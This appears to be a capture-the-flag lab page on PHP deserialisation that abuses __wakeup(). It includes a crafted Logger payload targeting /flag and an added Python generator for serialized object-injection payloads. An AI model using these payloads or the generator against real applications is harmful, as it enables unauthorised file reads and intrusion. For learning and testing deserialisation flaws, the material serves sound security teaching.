Deserialisation Lab 2 - Magic Method (__wakeup) Abuse


Log Import Tool

This tool accepts a base64-encoded, PHP-serialized Logger object, decodes it and hands the result to unserialize().

The Logger class defines a __wakeup() magic method. PHP invokes it automatically on every object that unserialize() reconstructs, so whatever property values the payload carries are already in place when it runs; the application never gets a chance to validate them first.

Example safe payload (base64):

Tzo2OiJMb2dnZXIiOjI6e3M6NzoibG9nRmlsZSI7czoxMjoiL3RtcC9hcHAubG9nIjtzOjEwOiJsb2dNZXNzYWdlIjtzOjE0OiJVc2VyIGxvZ2dlZCBpbiI7fQ==

Decoded: O:6:"Logger":2:{s:7:"logFile";s:12:"/tmp/app.log";s:10:"logMessage";s:14:"User logged in";}



Hint

Craft a Logger object whose logFile property is /flag instead of /tmp/app.log. The length prefix of every s:N: field must equal the byte length of the new value (5 for /flag, 4 for pwnd), or unserialize() rejects the payload outright.
Serialized: O:6:"Logger":2:{s:7:"logFile";s:5:"/flag";s:10:"logMessage";s:4:"pwnd";}
Base64-encode it and submit. __wakeup() fires inside unserialize() with the attacker-chosen logFile already set.
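The payload-crafting step above is where most attempts fail: PHP's serialize() format stores every string length in bytes, and a single wrong count makes unserialize() return false without ever reaching __wakeup(). The following script is an added example, not part of the lab; it generates the serialized Logger object and its base64 form for any logFile/logMessage pair, parses the result back to confirm the lengths are right, and also handles the NUL-prefixed names PHP uses for protected and private properties (assumed here for completeness; the lab's own properties are public). The class name Logger and the property names logFile and logMessage are taken from the page; PhpObject, build_payload and decode_payload are helpers invented for this example.

```python
import base64
from dataclasses import dataclass, field


@dataclass
class PhpObject:
    """A PHP object to serialise: class name plus an ordered property map."""
    cls: str
    props: dict = field(default_factory=dict)


def php_serialize(value):
    """Emit PHP serialize() output for str, int, bool and PhpObject values.

    PHP writes string lengths in BYTES (s:<bytes>:"..."), so multibyte
    characters and the NUL bytes in non-public property names must be
    counted after UTF-8 encoding; hand-edited payloads usually break here.
    """
    if isinstance(value, bool):          # test bool first: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        cls_len = len(value.cls.encode("utf-8"))
        return f'O:{cls_len}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type: {type(value).__name__}")


def protected_name(name):
    """Property name as PHP emits it for a protected property (NULs count toward the length)."""
    return f"\x00*\x00{name}"


def private_name(cls, name):
    """Property name as PHP emits it for a private property declared in class cls."""
    return f"\x00{cls}\x00{name}"


def php_unserialize(data: bytes):
    """Parse the same subset back, raising ValueError on any length mismatch."""
    pos = 0

    def expect(tok):
        nonlocal pos
        if data[pos:pos + len(tok)] != tok:
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def read_until(sep):
        nonlocal pos
        end = data.index(sep, pos)
        tok, pos = data[pos:end], end + 1
        return tok

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        pos += 2                          # skip the type letter and ':'
        if tag == b"i":
            return int(read_until(b";"))
        if tag == b"b":
            return read_until(b";") == b"1"
        if tag == b"s":
            n = int(read_until(b":"))
            expect(b'"')
            s, pos = data[pos:pos + n], pos + n
            expect(b'";')                 # fails if the declared length was wrong
            return s.decode("utf-8")
        if tag == b"O":
            n = int(read_until(b":"))
            expect(b'"')
            cls, pos = data[pos:pos + n].decode("utf-8"), pos + n
            expect(b'":')
            count = int(read_until(b":"))
            expect(b"{")
            obj = PhpObject(cls)
            for _ in range(count):
                key = parse()
                obj.props[key] = parse()
            expect(b"}")
            return obj
        raise ValueError(f"unsupported tag {tag!r} at offset {pos - 2}")

    result = parse()
    if pos != len(data):
        raise ValueError("trailing bytes after serialized value")
    return result


def build_payload(log_file, log_message):
    """Serialised Logger object plus the base64 form the lab's form accepts."""
    obj = PhpObject("Logger", {"logFile": log_file, "logMessage": log_message})
    serialized = php_serialize(obj)
    return serialized, base64.b64encode(serialized.encode("utf-8")).decode("ascii")


def decode_payload(b64):
    """Base64-decode a payload and parse it: a pre-flight check before submitting."""
    return php_unserialize(base64.b64decode(b64))


if __name__ == "__main__":
    # Both the page's safe example and the hint's /flag variant.
    for log_file, msg in (("/tmp/app.log", "User logged in"), ("/flag", "pwnd")):
        serialized, b64 = build_payload(log_file, msg)
        decode_payload(b64)               # round-trip: raises if any length is off
        print(serialized)
        print(b64)
```

Run it and paste the second base64 line into the form. If the target's Logger declared logFile as protected or private, build the property map with protected_name("logFile") or private_name("Logger", "logFile") instead of the bare name; the NUL bytes are part of the name and of the declared length.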

